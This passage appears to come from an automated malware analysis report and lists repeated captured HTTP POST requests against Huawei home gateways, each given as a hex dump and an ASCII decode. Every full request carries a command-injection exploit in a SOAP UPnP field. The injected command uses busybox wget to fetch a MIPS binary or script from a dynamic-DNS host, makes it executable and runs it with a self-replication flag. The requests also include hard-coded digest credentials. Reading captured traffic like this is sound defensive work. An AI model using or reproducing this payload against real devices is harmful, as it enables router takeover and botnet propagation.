xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 452Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 2e 61 6d 6b 20 2d 72 20 2f 68 75 61 77 65 69 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 61 6d 6b 3b 20 73 68 20 2f 74 6d 70 2f 2e 61 6d 6b 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/.amk -r /huawei; /bin/busybox chmod 777 /tmp/.amk; sh /tmp/.amk)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><
